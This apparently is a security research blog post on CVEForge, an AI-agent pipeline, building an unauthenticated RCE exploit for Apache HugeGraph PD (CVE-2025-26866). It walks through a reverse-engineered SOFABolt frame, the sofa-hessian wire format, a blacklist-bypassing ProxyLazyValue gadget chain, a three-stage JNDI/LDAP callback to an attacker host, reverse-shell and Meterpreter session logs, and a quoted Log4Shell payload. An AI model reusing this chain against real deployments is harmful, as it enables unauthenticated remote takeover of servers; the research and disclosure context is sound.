CVE-2025-26866: From Undocumented Binary Protocol to Root Shell - AI Agent Meets Java Deserialization

Fifty-six CVEs. Fifty-six working exploits. Average cost $13, average time 35 minutes. CVEForge had been running so clean for so long that feeding it another target had become a background task - pick a CVE, type the command, check back after lunch.

Number fifty-seven ate lunch.

CVE-2025-26866 - a Hessian deserialization RCE in Apache HugeGraph - cost $49, took four hours, burned through three context windows, and the session still says "status": "in-progress". By every metric we track, this was our first failure.

It also produced the most technically impressive exploit in our entire set. And then we had to finish the job ourselves.

This is the story of an AI agent that reverse-engineered an undocumented binary protocol from decompiled bytecode, mapped a non-standard serialization format byte by byte, and found a JDK-only gadget chain to bypass a class blacklist - and of the humans who took that work and turned it into a root shell.

The Target

CVE-2025-26866 is an insecure Hessian2 deserialization vulnerability in Apache HugeGraph PD - the Placement Driver component that manages cluster coordination via the Raft consensus protocol. The attack surface is a SOFABolt RPC service on TCP port 8610, exposed without authentication. Send a crafted binary message, the server deserializes it with Hessian2Input.readObject(), and if you can find the right gadget chain, you get remote code execution.

On paper, it looks like a standard Java deserialization bug. CVSS 8.8. No authentication required. Clear deserialization sink. Known gadget libraries on the classpath - Commons Collections 3.2.2, Commons BeanUtils 1.9.4, Spring Framework 5.3.20.

Every previous Java deserialization CVE we’d run through CVEForge had been straightforward: identify the sink, find a classpath-compatible gadget chain, serialize, send, shell. Fifteen minutes for the PoC agent. Maybe twenty if the protocol had a custom header.

This one took four hours and three context window resets. Here’s why.

Three Walls

The agent hit three independent obstacles, each of which would have been a reasonable stopping point for most automated tooling. It didn’t stop.

Wall 1: The Wire Format Isn’t Standard

The first payload attempt used textbook Hessian 2.0 encoding - H tag (0x48) for maps, C tag (0x43) for class definitions, Z (0x5A) for end markers. Every deserialization tutorial on the internet, every ysoserial variant, every Hessian2 reference implementation uses these tags.

The server rejected all of them. readObject: unknown code 0x48.

This is the moment most tooling gives up. The format is documented. The implementation should follow the documentation. When it doesn’t, you need a human to stare at hex dumps.

The agent’s response was methodological. It wrote a Java probe that tested all 256 possible byte values against Hessian2Input.readObject():

for (int tag = 0; tag <= 0xFF; tag++) {
    byte[] data = new byte[]{(byte) tag};
    try {
        Hessian2Input in = new Hessian2Input(new ByteArrayInputStream(data));
        in.readObject();
    } catch (Exception e) {
        // log what each tag does
    }
}

Then it serialized known Java objects using the server’s own sofa-hessian 3.3.6 library and captured the wire format. What came out was a completely different encoding:

Element	Standard Hessian 2.0	sofa-hessian 3.3.6
Untyped map	`H ... Z` (0x48…0x5A)	Not supported
Typed map	`M type ... Z`	`M t <2B-len> <type> ... z` (lowercase)
End marker	`Z` (0x5A)	`z` (0x7A)
Class def	`C name nfields fields`	`O <compact-int(strlen)> <raw-name> <compact-int(nfields)> <fields>`
Object instance	`0x60-0x6E` (compact)	`o <compact-int(ref)>`

The library is called Hessian2Input. It does not use the Hessian 2.0 wire format. It uses a custom variant closer to Hessian 1.0 with its own extensions. This is the kind of detail that doesn’t show up in advisories, blog posts, or ysoserial README files. You find it by reading the bytes.

Wall 2: The Protocol Has a Protocol

The Hessian2 payload doesn’t go over raw TCP. It goes inside a SOFABolt frame - Ant Group’s binary RPC protocol, used internally at Alibaba and in various open-source projects. The frame format is undocumented outside of the Java source code.

The agent’s first frame attempt used a 17-byte header. The server logged Unknown command type: 111. The value 111 is 0x6F - the ASCII code for o, which is the sofa-hessian object instance tag. The server was reading past the header into the payload body, which meant the header was too short.

To figure out the correct format, the agent installed the CFR Java decompiler inside the Docker container and decompiled SOFABolt’s RpcCommandDecoderV2 class. The actual V1 header is 22 bytes - the missing fields were ver2 (1 byte) and timeout (4 bytes):

[proto(1)] [type(1)] [cmdcode(2)] [ver2(1)] [reqId(4)] [codec(1)]
[timeout(4)] [class_len(2)] [header_len(2)] [content_len(4)]

After fixing the frame, the agent sent a heartbeat and got an ACK. First successful protocol-level communication. Then an RPC request with the correct className field - org.apache.hugegraph.pd.raft.RaftRpcProcessor$GetMemberRequest - and got SERVER_EXCEPTION. The frame was being parsed. The class name was being read. Deserialization was being attempted.

Turn 384 of the first context window. Two walls down.

Wall 3: The Blacklist Blocks Everything Good

With the transport and encoding solved, the agent built a Commons Collections gadget chain. The server rejected it - sofa-hessian 3.3.6 includes a NameBlackListFilter that prefix-matches against a list of known dangerous classes:

com.sun.rowset.JdbcRowSetImpl
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
javax.xml.transform.Templates
org.apache.commons.collections.*
org.springframework.*

The classics. Every gadget chain the agent had used in previous CVE runs was blocked. Commons Collections InvokerTransformer - blocked. Spring ABFPA - blocked. TemplatesImpl - blocked.

But the blacklist doesn’t block everything. The agent researched Hessian-specific gadget chains from academic papers and Chinese security research, and found the ProxyLazyValue chain - a technique that uses only javax.naming.ldap.Rdn$RdnEntry, javax.swing.UIDefaults, and javax.swing.UIDefaults$ProxyLazyValue. JDK classes. Not on the blacklist in sofa-hessian 3.3.6. (They were added in 3.5.5 - as the fix for CVE-2024-46983 - but HugeGraph PD 1.5.0 ships the older library.)

The chain:

TreeMap.put(RdnEntry2, "v2")
  └→ RdnEntry2.compareTo(RdnEntry1)
       └→ UIDefaults_A.equals(UIDefaults_B)
            └→ UIDefaults_B.get("x")
                 └→ ProxyLazyValue.createValue()
                      └→ Constructor.newInstance()
                           └→ new FileOutputStream("/tmp/hugegraph_rce_proof")

ProxyLazyValue.createValue() invokes Constructor.newInstance() when methodName is null, using className and args to instantiate an arbitrary class. The agent configured it to create a FileOutputStream - proving arbitrary code execution by creating a file on the target.

The Blunder

Here’s where we need to be honest about something.

We have a bug. The PoC agent’s turn counter - the thing that tracks how many LLM round-trips the agent has made - wasn’t being captured in our audit logs for this run. The workflow log records timestamps and phase transitions, but the actual turn-by-turn reasoning that drove each discovery was truncated. We know the agent spent 388 turns in the first context window, roughly 425 in the second, and some number in the third. We know this from the internal agent state. But the detailed reasoning chain - the part where you’d see it formulate hypotheses, test them, and adjust - is partially lost.

This is the equivalent of watching a chess match but only seeing every fifth move. You can reconstruct the logic from the board state, but the intermediate reasoning - the candidate moves considered and rejected - is gone.

We’ve been asked if we’re fixing the logging. The honest answer is we’re still debating it. On the one hand, losing the reasoning trace on the most interesting run we’ve ever had is genuinely painful. On the other hand, there’s something poetic about an autonomous agent that reverse-engineers an undocumented binary protocol and then refuses to let you see how it did it. We may have accidentally built the first AI security researcher with operational security.

For this post, we’re working from what we have: the workflow timestamps, the session metrics, the deliverables the agent produced, and the portions of reasoning we did capture. If the agent wants credit for its methodology, it can start writing its own audit logs.

We did, eventually, manage to recover fragments from a secondary log buffer. Not the complete 800+ turns - but enough to watch the agent think. We show what we found below .

The Numbers

Phase	Duration	Cost	Notes
Intel	5m 23s	$1.88	CVE brief, source clone, version identification
Analysis	10m 38s	$1.98	Fix diff trace, vulnerable path, classpath mapping
Lab Build	27m 59s	$2.40	Maven build from source, single container
PoC & Verify	198m 58s	$42.94	3 context windows, ~800+ turns
Report	-	-	Never reached
Total	4h 3m	$49.20

Read that PoC line again. $42.94. Three hours and nineteen minutes. That’s 82% of the total cost, concentrated in a single agent trying to write a working exploit against a target that refused to cooperate.

Our average CVE run costs $13 and takes 35 minutes. This one cost nearly four times as much and took seven times as long. And the session metrics still show "status": "in-progress" - the agent confirmed RCE but never completed the report and bypass phases before we pulled the plug.

For context: the most expensive previous run was LibreNMS at ~$20. CVE-2025-26866 blew past that before the second context window was half done.

What It Actually Produced

Here’s the thing. Despite the cost, despite the incomplete status, despite the fact that we classify this as our first “failure” - the agent produced a working exploit.

At turn 564 of the second context window (10:31 AM, three hours and forty-nine minutes into the run), the Java exploit fired and the marker file appeared on the target:

[+] RCE CONFIRMED! The gadget chain works perfectly!
    The marker file was created.

By turn 588, the agent had ported the entire exploit to pure Python - 700+ lines of stdlib-only code that reimplements:

The sofa-hessian 3.3.6 custom wire format (every tag, every encoding quirk)
The SOFABolt V1 binary RPC framing (22-byte header, className field, content wrapping)
The ProxyLazyValue gadget chain (6-object chain with TreeMap trigger)

No Java dependencies. No ysoserial. No marshalsec. A standalone Python script that speaks a custom binary protocol to exploit a Java deserialization vulnerability through a blacklist bypass. Written autonomously by an AI agent that had never seen this protocol before.

[*] Building sofa-hessian payload with ProxyLazyValue gadget chain...
[*] Hessian2 payload: 259 bytes
[*] Wrapping in SOFABolt V1 frame...
[*] Total frame: 343 bytes

[*] Sending exploit to localhost:8610...
[*] Response: 1318 bytes
[*] Status: SERVER_DESERIAL_EXCEPTION (0x0012)

[VERIFY] Checking for marker file in container...
[+] SUCCESS! Marker file exists:
    -rw-r--r-- 1 root root 0 Mar  1 10:43 /tmp/hugegraph_rce_proof

[+] RCE CONFIRMED - CVE-2025-26866 exploitation successful!

The SERVER_DESERIAL_EXCEPTION is expected - the ClassCastException that terminates the chain happens after the RCE trigger. The file is already created by the time the exception propagates.

Why This One Is Different

Every previous CVEForge run operated within known territory. SSTI? The agent knows Jinja2, FreeMarker, Blade, ERB. File upload? It knows polyglots, extension tricks, MIME validation. SQL injection? Time-based, boolean-based, error-based - all well-documented patterns. Even the more exotic ones - JNDI injection, OGNL expression injection, Pickle deserialization - have established exploitation playbooks.

CVE-2025-26866 had none of that. The agent faced three unknowns simultaneously:

An undocumented binary transport protocol that had to be reverse-engineered from decompiled Java bytecode
A non-standard serialization format that contradicts its own documentation, discovered through empirical byte-level probing
A class blacklist that blocks every commonly known gadget chain, requiring research into academic and non-English-language security publications

Each of these alone would be a reasonable challenge for a human security researcher. The agent solved all three and produced a working exploit. It just took longer and cost more than we’re used to.

The gap between “pattern match against known exploit classes” and “reverse-engineer the protocol from first principles” is the gap between automated vulnerability scanning and actual security research. This run crossed that line.

The Debugging Methodology

What made this run remarkable wasn’t just the outcome - it was the approach. The agent demonstrated several techniques we hadn’t seen in previous runs:

Byte-level probing. Testing all 256 possible tag values to map an undocumented serializer’s behavior. Not searching for documentation, not guessing - systematically enumerating the input space.

In-container decompilation. Installing CFR inside the Docker container to decompile SOFABolt and sofa-hessian classes. Reading the actual implementation instead of relying on documentation that turned out to be wrong.

Incremental protocol validation. Heartbeat first (does the transport work?), then RPC frame (does the framing work?), then empty content (does routing work?), then payload (does deserialization work?). Each step validated one layer before adding the next.

Cross-language chain porting. Discovering the working chain in Java (where the gadget libraries live), then reimplementing the entire exploit in Python (where the PoC needs to run). The Python version constructs every Hessian2 byte manually - no serialization library, no shortcuts.

Error message forensics. When the server returned Unknown command type: 111, the agent decoded 111 as 0x6F, recognized it as the Hessian2 o tag, and deduced that the frame header was too short - the server was reading into the payload. That’s the kind of reasoning that comes from understanding both the protocol layer and the serialization layer simultaneously.

Inside the Agent’s Head

After the initial write-up, we managed to recover fragments of the reasoning trace from a secondary log buffer. Not the complete 800+ turns - but enough to reconstruct the agent’s thought process across the critical moments. What follows is a chronological walk through the first context window - from initial confusion to working exploit - told in the agent’s own words.

“unknown code 0x48” (Turn 72)

The first sign of trouble. The agent sent a standard Hessian 2.0 payload and the server rejected the very first byte:

The error is readObject: unknown code 0x48 H. The 0x48 is ‘H’ which is the untyped map start tag. But Hessian2Input’s readObject() should handle ‘H’ as an untyped map.
Wait, actually the issue might be related to the Hessian version. In standard Hessian2: ‘H’ (0x48) = untyped map (Hessian 2.0), ‘M’ (0x4d) = typed map. But hessian-3.3.6.jar might be using an older protocol version that doesn’t support ‘H’ for untyped maps. Hessian 1.0 only used ‘M’ for maps, while 2.0 introduced ‘H’ for untyped maps. The version number doesn’t necessarily indicate which protocol version is being used.

This is the moment the agent realized it couldn’t trust the documentation. The library is called Hessian2Input. It says “2” right there in the class name. And the H tag - defined in the Hessian 2.0 specification - is unknown.

The Tag Matrix (Turn 127)

Rather than guess which tags might work, the agent wrote a brute-force probe that tested all 256 byte values as tags against Hessian2Input.readObject(). Fifty-five turns of hypothesis, probe, compile, run, and analyze later, it had a definitive answer:

Now I have a clear picture of what tags are supported:
SUPPORTED (no “unknown code” error): 0x4f ‘O’: Supported but expects integer - this is the Hessian 2.0 object instance tag! 0x4d ‘M’: Supported (but needs more data) - Hessian 1.0 map 0x56 ‘V’: Supported (but needs more data) - Hessian 2.0 typed list 0x52 ‘R’: Supported (NullPointerException = reference lookup failed) - Hessian 1.0 ref
NOT SUPPORTED: 0x43 ‘C’: NOT SUPPORTED - class definition 0x48 ‘H’: NOT SUPPORTED - Hessian 2.0 untyped map 0x5a ‘Z’: NOT SUPPORTED - Hessian 2.0 map/list end
The implementation is picking and choosing from both Hessian versions - supporting ‘M’ for maps, ‘O’ for objects, and ‘V’ for typed lists, but notably missing class definitions and various reference/list handling mechanisms.
Now I’m realizing there’s a contradiction: ‘O’ expects an integer reference to a class definition, but ‘C’ for defining classes isn’t supported.

A few turns later, it cracked the full encoding by hex-dumping objects serialized by the library itself:

So the pattern is clear: ‘O’ marks a class definition with the class name length as a compact integer, followed by the UTF-8 bytes, then the field count and field names, while ‘o’ references that class and provides the actual field values. This is definitely a custom SOFAHessian extension, not standard Hessian 2.0.

Wall one down.

The Silent Death (Turns 148–151)

With the wire format mapped, the agent built a Commons Collections gadget chain - LazyMap + InvokerTransformer + TiedMapEntry, the classic. The payload serialized. The server deserialized it without error. And nothing happened. No file created. No exception. Silence.

The file wasn’t created. The deserialization succeeded (no exception), but the command didn’t execute. Let me think about why…
I think I see the problem now - MapDeserializer is treating LazyMap as a regular Map and reconstructing it incorrectly, so TiedMapEntry.map ends up being a plain HashMap with the factory stored as a regular entry rather than as LazyMap’s actual factory field.

Two turns later, the agent wrote a diagnostic that serialized a LazyMap and inspected what came back:

Deserialized as: java.util.HashMap (NOT LazyMap!) Map keys: [factory, map] - treated as map entries, not object fields
The problem is clear: MapDeserializer.readObject() creates a plain HashMap and treats the field names as map keys, not object fields. The LazyMap class is completely lost.
I need to abandon the LazyMap approach entirely and find a different gadget chain.

This is the most painful moment in the log. The agent had spent a hundred turns cracking the wire format, carefully constructed a gadget chain, and it worked - except the one class the entire chain depends on was silently replaced by a HashMap during deserialization. No error, no warning. Just a functional chain that does nothing. Every Map-implementing gadget class has this problem: sofa-hessian’s MapDeserializer strips the implementation and creates a bare HashMap.

What followed was an exhaustive search - PriorityQueue + BeanComparator, EventHandler proxies, Spring ABFPA, ScriptEngineManager, BCEL classloaders, SignedObject - each explored and rejected for specific technical reasons.

The Blacklist and the Breakthrough (Turns 390–429)

After two hundred turns of dead ends, the agent decompiled the HessianSerializer and found the blacklist it hadn’t known about:

There IS a blacklist on the target! The HessianSerializer in com.alipay.remoting (SOFABolt) uses its own SerializerFactory that has a NameBlackListFilter. The inBlackList() method uses String.startsWith(), which means the blacklist entries are prefixes, not exact matches!

Then came the longest single thinking block in the entire 596-turn log - 57,766 characters. In it, the agent systematically evaluated over forty potential bypass classes, checking each against the prefix-based blacklist and the MapDeserializer constraint. TemplatesImpl - blocked. SignedObject - blocked. InitialContext - blocked. ScriptEngineManager - blocked. On and on.

Until:

Since this is CVE-2025-26866, there’s likely a documented exploit vector… CVE-2024-46983 is a known bypass for the sofa-hessian blacklist that uses only JDK classes with no third-party dependencies. This was fixed in sofa-hessian 3.5.5. Our target uses sofa-hessian 3.3.6, which is BEFORE the fix!

The agent traced the chain through the source code, then verified each class against the blacklist:

SwingLazyValue → NOT blacklisted! (no entry starting with sun.swing) RdnEntry → NOT blacklisted (only javax.naming.InitialContext blocked) UIDefaults → NOT blacklisted

When SwingLazyValue turned out to be unavailable on JDK 11 (ClassNotFoundException), the agent pivoted to ProxyLazyValue - a public inner class of UIDefaults with the same createValue() mechanism - and mapped the final chain:

When TreeMap.put(rdnEntry2) triggers compareTo(rdnEntry1), the UIDefaults.equals() comparison calls get(“key”), which invokes ProxyLazyValue.createValue() to execute the static method specified by className and methodName with the provided args, achieving RCE.
Even if deserialization fails afterward, the file has already been created - we’ll get an error response but the RCE proof will be there.

The 0xAE Problem (Turn 566)

The RCE fired. Now the agent needed to port the Java exploit to pure Python - which meant understanding every byte of the sofa-hessian encoding without a serialization library. At turn 566, it was analyzing a hex dump of the working payload and hit an unfamiliar byte:

The hex shows 0xAE after the ‘O’, which doesn’t match what I’d expect for “javax.naming.ldap.Rdn$RdnEntry” (30 characters would be 0x1E), so something about my understanding of the encoding is wrong.
Let me work backwards from what I know: the deserialization succeeds, so I should trace through how readObject() handles the ‘O’ tag… Now I’m tracing through what happens when the code is 0xAE (174). This value doesn’t match the special cases for codes 0-3 or the compact string range… 0xAE is actually in the range [0x80, 0xBF], which should be interpreted as a compact int, not a string tag.

Two turns later, it stopped guessing and wrote a systematic probe - a Java program that called every encoding function in sofa-hessian with the exact classes from the gadget chain:

// Turn 568: AnalyzeFormat.java - systematic wire format analysis

// How does writeObjectBegin encode a 30-char class name?
bos = new ByteArrayOutputStream();
out = new Hessian2Output(bos);
out.writeObjectBegin("javax.naming.ldap.Rdn$RdnEntry");
out.close();
hexdump("OB-RdnEntry(30)", bos.toByteArray());

// How about a 37-char class name?
bos = new ByteArrayOutputStream();
out = new Hessian2Output(bos);
out.writeObjectBegin("javax.swing.UIDefaults$ProxyLazyValue");
out.close();
hexdump("OB-PLV(37)", bos.toByteArray());

// What happens with type references on second use?
bos = new ByteArrayOutputStream();
out = new Hessian2Output(bos);
out.writeMapBegin("javax.swing.UIDefaults");
out.writeString("k1"); out.writeString("v1");
out.writeMapEnd();
out.writeMapBegin("javax.swing.UIDefaults");
out.writeString("k2"); out.writeString("v2");
out.writeMapEnd();
out.close();
hexdump("TwoMaps", bos.toByteArray());

Every class in the gadget chain, serialized individually, hex-dumped, compared. Not “try random things and see what works” - methodical elimination of encoding ambiguity by testing each operation in isolation.

The Moment It Clicked (Turn 563)

When the RCE fired, the agent’s reasoning trace showed it understood exactly why the chain worked - not just that it did:

EXCELLENT! The RCE is CONFIRMED! The gadget chain works:
1. The payload was built using sofa-hessian’s Hessian2Output (259 bytes) 2. When deserialized, the chain triggered correctly: - TreeMap.put() triggered RdnEntry.compareTo() - RdnEntry.compareTo() triggered UIDefaults.equals() - UIDefaults.get() found ProxyLazyValue and called createValue() - ProxyLazyValue.createValue() called new FileOutputStream("/tmp/hugegraph_rce_proof") 3. The ClassCastException that follows is expected since UIDefaults can’t be cast to String, but the damage is already done

This isn’t an agent that stumbled into a working exploit. It understood the complete execution flow - from the TreeMap comparator entry point through each gadget link to the final constructor invocation. It knew exactly which exception was expected, and why the side effect survived the exception propagation.

The next thing it did was start planning the Python port. Twenty-four turns later, it had 700 lines of standalone Python that reproduced every byte of this chain from scratch.

What We Learned

The ceiling exists, and it’s binary protocols. Everything before this run was application-layer - HTTP endpoints, REST APIs, web sockets. The agent navigated those fluently because the protocol is well-known and the framing is text-based. Binary protocols with custom framing and non-standard encoding are categorically harder. Not impossible - this run proved that - but the cost/time profile changes dramatically.

Context windows are the real bottleneck. The agent solved the problem across three context windows. Each window started fresh (with deliverables from the previous attempt as context), which meant re-establishing state and re-deriving conclusions. If we could give the agent an unlimited context window, this run would have been significantly cheaper and faster. The $42.94 PoC cost includes a lot of redundant work across window boundaries.

Cost scales with novelty, not difficulty. The “hardest” CVE in our set (by CVSS) was not the most expensive. The most expensive was the one where the agent couldn’t fall back on known patterns. A CVSS 10.0 SSTI costs $7. A CVSS 8.8 deserialization behind an undocumented protocol costs $49. The agent’s efficiency correlates with how much of the problem maps to established exploitation playbooks.

“Failed” is relative. Our internal classification says this run failed - the session never completed, the report phase never ran, the bypass agent never activated. But the workspace contains a working RCE exploit, a complete lab, a vulnerability analysis, and a PoC verification report. If you’re a defender trying to understand whether CVE-2025-26866 is exploitable, this “failure” gives you everything you need.

The Fifty-Seven Streak

For the record: CVE-2025-26866 was our fifty-seventh CVE. The first fifty-six all produced complete outputs - working PoCs, Docker labs, verification reports, and when triggered, bypass analyses. The first fifty-six averaged $13 and 35 minutes each.

Number fifty-seven cost $49 and took four hours. And produced the most technically interesting exploit in the entire set.

We’d take that trade every time.

From File Creation to Root Shell

But here’s the thing about creating an empty file on disk: it’s proof of concept, not proof of compromise. The agent proved it could execute arbitrary constructors through the ProxyLazyValue chain - new FileOutputStream("/tmp/marker") - and that’s genuinely impressive. It’s also not the kind of thing that gets you a reverse shell.

We wanted a Metasploit module.

For our growing library of MSF modules , the bar is always the same: check identifies the target, exploit delivers a session. Unix Command target for quick cmd/unix/reverse_bash shells, Linux Dropper target for Meterpreter. Two targets minimum. AutoCheck. CmdStager. The works.

The agent had done the hard part - reverse-engineering the protocol, the wire format, and the blacklist bypass. We just needed to turn “create a file” into “execute arbitrary commands.” How hard could that be?

The Static Method Problem

ProxyLazyValue is a beautifully constrained primitive. When methodName is null, it calls a constructor - that’s how the agent got new FileOutputStream(path). When methodName is set, it calls a static method via reflection:

Class.forName(className).getMethod(methodName, types).invoke(null, args)

Static methods only. No instance methods. And here’s the problem: Runtime.exec() is an instance method. So is ProcessBuilder.start(). Every obvious path to command execution requires an object reference that ProxyLazyValue can’t provide.

But System.setProperty() is static. And InitialContext.doLookup() is static.

The first one lets you manipulate the JVM’s runtime configuration. The second one triggers a JNDI lookup to a URL you control. If that URL points at an LDAP server you own, and that LDAP server responds with a serialized Java object in the javaSerializedData attribute, the target’s JNDI client will dutifully deserialize it. If that serialized object happens to be a Commons Collections or Commons BeanUtils gadget chain with an embedded command - well, now you have arbitrary command execution.

This is the same JNDI deserialization technique that powered Log4Shell. Except instead of ${jndi:ldap://evil.com/x} in a log message, we’re triggering it through a Hessian deserialization chain inside a SOFABolt frame on a Raft consensus port. Same destination, very different road.

Two More Walls

If you’ve been doing Java security since the Log4Shell era, you already know what’s coming. The JDK and library maintainers didn’t sit idle after December 2021.

Wall 4: JDK 11.0.19+ blocks JNDI LDAP deserialization. The property com.sun.jndi.ldap.object.trustSerialData defaults to false on any JDK released after mid-2023. Our target runs OpenJDK 11.0.30. When the JNDI client receives a javaSerializedData attribute from our LDAP server, it checks this property, sees false, and throws a NamingException. Payload never gets deserialized.

Wall 5: Commons Collections 3.2.2 blocks InvokerTransformer. The readObject() method on InvokerTransformer calls FunctorUtils.checkUnsafeSerialization(), which reads org.apache.commons.collections.enableUnsafeSerialization at runtime. If it’s not "true", deserialization throws an UnsupportedOperationException. Every CC chain that uses InvokerTransformer - which is most of them - is dead on arrival.

Two walls. And we’d already burned through three of the agent’s context windows getting past the first three.

But we had something the agent didn’t: we already understood ProxyLazyValue. And System.setProperty() is a static method.

The Three-Stage Chain

The solution was almost elegant. Instead of one SOFABolt frame, send three:

Stage 1: ProxyLazyValue → System.setProperty("com.sun.jndi.ldap.object.trustSerialData", "true")

This has to fire before the JDK’s com.sun.jndi.ldap.Obj class is loaded. That class reads the property into a static final field during class initialization - once it’s cached, you can’t change it. But if no JNDI LDAP operation has occurred yet in the JVM’s lifetime (and in a Raft consensus service, why would one have?), the class hasn’t been loaded. Our setProperty call wins the race by default.

Stage 2: ProxyLazyValue → System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true")

Unlike the JDK property, this one is checked dynamically on every deserialization call. No race condition to worry about. Set it once, it stays set.

Stage 3: ProxyLazyValue → InitialContext.doLookup("ldap://ATTACKER:1389/dc=random")

Now the JNDI lookup fires. The JVM’s LDAP client connects to our Metasploit LDAP server (courtesy of the JndiInjection mixin - thank you, MSF framework authors). We serve back a javaSerializedData attribute containing a serialized gadget chain. The target deserializes it. Command executes. Shell connects back.

Three frames. Three side effects. Each one a SERVER_DESERIAL_EXCEPTION on the wire - because the ClassCastException from the TreeMap/RdnEntry chain fires after the ProxyLazyValue side effect has already executed. The server thinks it’s rejecting garbage. It is. The damage is already done.

[*] Stage 1: Setting trustSerialData=true via ProxyLazyValue...
[*] Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
[*] Stage 3: Triggering JNDI lookup -> ldap://172.18.0.3:1389/dc=drkqrx,dc=ozw
[+] JNDI callback received, delivering CommonsBeanutils1 payload...
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.2:57928)

No special JVM flags. No preconditions. Just network access to port 8610.

The Last Gotcha

Except it didn’t work. Not the first time.

We spent an embarrassing amount of time debugging a silent failure. All three stages fired. The JNDI callback arrived at our LDAP server. The serialized payload was delivered. And… nothing. No command execution. No execve in strace output. The CommonsCollections1 chain was being deserialized and silently dying somewhere inside the JVM.

We checked the BER encoding. Correct. We checked the LDAP response format. Correct. We added both JVM flags manually to the Docker container - trustSerialData=true and enableUnsafeSerialization=true - set at startup, no race conditions possible. Still nothing.

This is the kind of bug that makes you question your understanding of Java deserialization at a fundamental level. Everything was right. The payload was right. The delivery was right. The properties were right. And it just… didn’t work.

The answer, when we finally found it, was one of those facts that experienced Java security researchers know in their bones but that never quite makes it into the ysoserial README:

CommonsCollections1 is broken on JDK 9+.

CC1’s entry gadget is AnnotationInvocationHandler.readObject(). In JDK 8, this method iterates over the map entries and triggers the chain through Map.entrySet(). In JDK 9, Oracle rewrote the method to use a LinkedHashMap copy. The proxy-based interception that makes the chain work simply doesn’t fire anymore. The object deserializes successfully, quietly does nothing, and gets garbage collected. No exception. No error. No indication that anything went wrong.

We’d been debugging a payload that was fundamentally incapable of executing on our target. All the property-setting, all the LDAP delivery, all the BER encoding work - correct. The chain itself was the one thing we never questioned, because CommonsCollections1 is the “default” Java deserialization chain. It’s the one everyone reaches for first. And on JDK 11, it’s a no-op.

The fix was one line: switch from CommonsCollections1 to CommonsBeanutils1.

CB1 uses PriorityQueue → BeanComparator → TemplatesImpl - no AnnotationInvocationHandler anywhere in the chain. Works on every JDK version from 7 through 21. Doesn’t even need enableUnsafeSerialization because it doesn’t touch InvokerTransformer. The target has commons-beanutils-1.9.4.jar on the classpath. One line change, and:

[*] Started reverse TCP handler on 172.18.0.3:4444
[*] Stage 1: Setting trustSerialData=true via ProxyLazyValue...
[*] Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
[*] Stage 3: Triggering JNDI lookup -> ldap://172.18.0.3:1389/dc=drkqrx,dc=ozw
[+] JNDI callback received, delivering CommonsBeanutils1 payload...
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.2:57928)

Root shell. No JVM flags. No preconditions. Unauthenticated, from the network, against a stock Apache HugeGraph PD 1.5.0 deployment.

The Meterpreter target works too:

[*] Sending stage (3045380 bytes) to 172.18.0.2
[*] Meterpreter session 1 opened (172.18.0.3:4444 -> 172.18.0.2:59678)

Module number sixteen. Our first Java deserialization + JNDI injection module. And a reminder that “known” gadget chains have expiration dates that nobody bothers to print on the label.

What’s Next

We’re still not fixing the turn logging. We’ve decided it adds mystique. (We’re fixing the turn logging.)

We’re also looking at what it would take to handle binary protocols more reliably. The agent solved this one through brute persistence and creative debugging, but we’d rather see it solve it in one context window instead of three. That probably means giving it better tooling for protocol reverse engineering - hex dump analysis, pattern matching against known protocol families, automated decompilation pipelines.

The exploit, the lab, the Metasploit module, and the full writeup are on GitHub:

Fifty-seven CVEs. Fifty-seven working exploits. Sixteen Metasploit modules. One “failure” that taught us more than the other fifty-six combined.

The pipeline keeps running. Some days it makes coffee-break exploits. Some days it makes you sit and watch. And some days, it does ninety percent of the work and leaves you the last ten percent - the ten percent that reminds you why you got into this in the first place.

CVEForge Series:
From CRLF Injection PoC to Fix Bypass - the one-prompt precursor
CVE-2025-53833: From CVE Number to Root Shell in 32 Minutes - the first full run
Zero to RCE: Three Vulnerability Classes - three CVEs, three PoCs, one bypass
OneBlog: 3 Bypasses in 5 Runs - the Java case study
Foreman & Telnetd - two CVEs, two very different fixes
72 Hours, 24 CVEs - the stress test
The One That Failed - you are here